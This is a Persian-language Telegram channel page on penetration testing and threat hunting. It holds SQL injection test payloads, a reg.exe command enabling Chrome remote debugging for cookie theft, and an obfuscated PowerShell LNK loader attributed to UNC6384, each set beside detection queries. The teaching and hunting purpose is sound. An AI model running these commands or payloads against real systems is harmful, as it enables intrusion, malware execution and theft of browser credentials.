Try Hack Box
5.9K subscribers
685 photos
65 videos
125 files
692 links
1 Nov 2020
1399/08/11
آموزش تست نفوذ و ردتیم

https://linkedin.com/company/tryhackbox-org/

یوتیوب
https://youtube.com/@tryhackbox

کانال ها :
@TryHackBoxOfficial ( نقشه راه )
@TryHackBoxStory ( اخبار و داستانهای هک )
پشتیبانی : @ThbxSupport
Download Telegram
🔖 بررسی SQL Injection (SQLi) : Blind, Time-Based, Error-Based - بخش اول

🔐 SQL Injection چیست؟

تزریق SQL (SQL Injection) یکی از رایج‌ترین و خطرناک‌ترین آسیب‌پذیری‌های امنیتی است که زمانی رخ می‌دهد که ورودی کنترل‌نشدهٔ کاربر مستقیماً داخل یک کوئری SQL قرار بگیرد.
در این حالت، مهاجم می‌تواند منطق کوئری را تغییر دهد و به داده‌ها دسترسی غیرمجاز پیدا کند، آن‌ها را تغییر دهد یا حتی حذف کند.
در سناریوهای شدیدتر، SQLi می‌تواند به اجرای دستورات در سطح سیستم‌عامل سرور منجر شود.

🧨 انواع SQL Injection

1. Classic / Error‑Based SQLi
استفاده از پیام‌های خطای SQL که با جزئیات نمایش داده می‌شوند برای استخراج ساختار دیتابیس (جداول، ستون‌ها و …).

2. Blind SQLi
هیچ خروجی یا خطای مستقیمی وجود ندارد؛ مهاجم نتیجهٔ کوئری را از طریق رفتار برنامه (True / False) استنتاج می‌کند.

3. Time‑Based Blind SQLi
مبتنی بر ایجاد تأخیر زمانی (مثل SLEEP() یا WAITFOR) برای تشخیص درست یا نادرست بودن شرط‌ها.

4. Out‑of‑Band SQLi
استفاده از کانال‌های ارتباطی جانبی مثل DNS یا HTTP Callback برای دریافت داده؛ زمانی کاربرد دارد که نه خروجی وجود دارد و نه تفاوت زمانی قابل تشخیص.

5. Second‑Order SQLi
ورودی مخرب ابتدا در دیتابیس ذخیره می‌شود و در مرحله‌ای دیگر (مثلاً هنگام پردازش بعدی) باعث اجرای تزریق SQL می‌گردد.

📍 SQL Injection کجا اتفاق می‌افتد؟

ا SQLi می‌تواند در هر نقطه‌ای رخ دهد که اپلیکیشن بر اساس ورودی کاربر به دیتابیس کوئری می‌زند، از جمله:

💠فرم‌های لاگین
💠 فیلدهای جستجو
💠فیلترها (دسته‌بندی، تاریخ و …)
💠پارامترهای GET و POST
💠فیلدهای مخفی (Hidden Fields)
💠هدرهای HTTP (User‑Agent، Referer و …)
💠کوکی‌ها

🕵️ شناسایی SQL Injection

تست‌های ساده اولیه:
' OR '1'='1
' OR 1=1 --

تست‌های پیشرفته‌تر (Time‑Based):
' AND SLEEP(5) --
' AND (SELECT 1 FROM dual WHERE SLEEP(5)) --

تست‌های منطقی (Boolean‑Based):
' AND 1=1 --   → رفتار عادی
' AND 1=2 -- → رفتار متفاوت

در سناریوهای Blind باید به این نشانه‌ها توجه کرد:

💠 تأخیر زمانی
💠 تفاوت در محتوای صفحه
💠 تغییر HTTP Status Code
💠 تغییر الگوی درخواست‌های شبکه

🗄 شناسایی نوع پایگاه داده (Database Engine)

تشخیص دیتابیس بک‌اند برای طراحی Payload دقیق‌تر حیاتی است:

MySQL
SELECT version();
SLEEP(5)

PostgreSQL
SELECT current_database();
pg_sleep(5)

MSSQL
SELECT @@version;
WAITFOR DELAY '00:00:05'

Oracle
SELECT banner FROM v$version;
DBMS_LOCK.SLEEP(5)


🔍 شما تا حالا با کدام نوع SQL Injection در پروژه یا تست نفوذ واقعی برخورد داشته‌اید؟ تجربتون را در کامنت‌ها به اشتراک بگذارید.

#باگ_بانتی
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
👏8
📌 برگزاری جلسه ویس چت :  مهندس مهرشاد علیزاده

با درود خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص واقعیت ‌های باگ بانتی در ایران از جذابیت تا سختی ‌هایی که این حوزه دارد به صورت ویس چت برگزار کنیم.

🎙 مهمان ویژه: 
مهندس مهرشاد علیزاده

📅 زمان برگزاری: پنجشنبه 1404/10/11
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 19:00
🔖  لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
📖 قسمت اول تعریف واقع بینانه باگ بانتی در ایران

💬 سوالات خود را درباره باگ بانتی در ایران در کامنت‌هاارسال کنید تا در جلسه به آن‌ها پرداخته شود.

🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .


🆔 @RadioZeroPod
🆔 @TryHackBox
6🤔1
💢 یک بکدور مخفی در نسخه PHP وجود داشت که اجازه اجرای کد از راه دور را در هدر user-agent می‌داد.

حدس بزنید دوستان، این نسخه کدام است؟


@TryHackBox
#backdoor #بکدور #درب_پشتی
👍2
Mobile Hacking Bug Bounty.pdf
4.4 MB
🔥 باگ بانتی Mobile Hacking : چک‌ لیست عملی
@TryHackBox
#چک_لیست #باگ_بانتی #checklist
🔥7
Please open Telegram to view this post
VIEW IN TELEGRAM
مطمئنم که می‌دانید مهاجمان از قابلیت «remote debugging» اکسپلویت می‌ کنند تا کوکی‌ ها را از مرورگرهای وب استخراج کنند. امروز بررسی می‌ کنیم که مهاجمان چگونه با تغییر رجیستری این قابلیت را فعال می‌ کنند.

اگر به این گزارش نگاه کنید.

متوجه می‌شوید که مهاجم از ابزار reg.exe برای تغییر رجیستری و مجاز کردن remote debugging استفاده کرده است:


reg.exe add HKEY_CURRENT_USER\Software\Policies\Google\Chrome /v RemoteDebuggingAllowed /t REG_DWORD /d 1 /f


برای مثال، می‌ توانیم سوءاستفاده از reg.exe را با نشانه‌های زیر جست‌وجو کنیم:

event_type: "processcreatewin"

AND

proc_file_path: "reg.exe"

AND

cmdline: "RemoteDebuggingAllowed"


یا می‌توان تمرکز را روی تغییر رجیستری گذاشت:

event_type: "registryvaluesetwin"

AND

reg_key_path: "RemoteDebuggingAllowed"


به نظر شما بهترین روش تشخیص و مقابله با چنین سوءاستفاده‌ای در محیط‌های سازمانی چیست و چه لاگ‌ها یا کنترل‌های دیگری را می‌توان برای شناسایی زودهنگام آن به کار گرفت؟


🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
1
فرآیند نصب بدافزار اغلب شامل باز کردن (استخراج) داده‌های آرشیو شده است.

امروز بررسی می‌کنیم که مهاجمان چگونه از ابزار tar اکسپلویت می‌کنند و چگونه می‌توان از این موضوع برای شکار پیش‌ دستانه (Proactive Hunting) استفاده کرد.


بیایید به UNC6384 نگاه کنیم.

مهاجم از یک فایل LNK مخرب استفاده کرده که شامل دستور زیر بوده است:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;"

این اسکریپت کارهای زیر را انجام می‌دهد:

به‌دنبال یک فایل ZIP با نام Agenda_Meeting 26 Sep Brussels.zip می‌گردد

محتوای آن را می‌خواند

یک بخش پنهان از داده‌ها که داخل این ZIP جاسازی شده را استخراج می‌کند (از بایت 721 به بعد)

این بخش پنهان را در یک فایل موقت ذخیره می‌کند (rjnlzlkfe.ta)

آن را با استفاده از tar استخراج می‌کند

یک فایل اجرایی را اجرا می‌کند

cnmpaui.exe :
— یک فایل قانونی که برای side-loading استفاده می‌شود

حالا روی tar تمرکز کنیم:
tar.exe -xvf C:\Users\<USER>\AppData\Local\Temp\rjnlzlkfe.ta -C C:\Users\<USER>\AppData\Local\Temp

برای مثال، می‌توان موارد اجرای tar از طریق PowerShell را جست‌وجو کرد:
event_type: "processcreatewin"

AND

proc_p_file_path: "powershell.exe"

AND

proc_file_path: "tar.exe"

همچنین می‌توان به‌دنبال استفاده از tar برای استخراج آرشیو در پوشه موقت (Temp) بود:

event_type: "processcreatewin"

AND

proc_file_path: "tar.exe"

AND

cmdline: ("xvf" AND "temp")


به نظر شما بهترین راه شناسایی اجرای مشکوک tar در سناریوهای واقعی چیست؟


🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
4👍2
File Upload Vulnerabilities Checklist.pdf
66.3 KB
🔥 چک لیست آسیب پذیری File Upload

@TryHackBox
#چک_لیست #آسیب_پذیری
7👍2
Live stream started
Live stream finished (14 minutes)
🚀 قسمت اول بوتکمپ SOC 0x4131!


🔗 Youtube:
https://youtu.be/-lwI1ifaIXQ
6👎1
🟠 در این قسمت سرفصل‌های کلیدی زیر رو بررسی کردیم:

- کلمات و اصطلاحات
- چیستی مرکز عملیات امنیت
- کار ها و وظایف در SOC
- مدل های کارکردن و جریان کاری در SOC
- نحوه بالا بردن مهارت در SOC

این مباحث پایه‌ای، شما را برای ورود به دنیای امنیت سایبری آماده می‌کند.


@TryHackBox

#SOC #امنیت_سایبری #بوتکمپ_SOC
8👍2🤔2👎1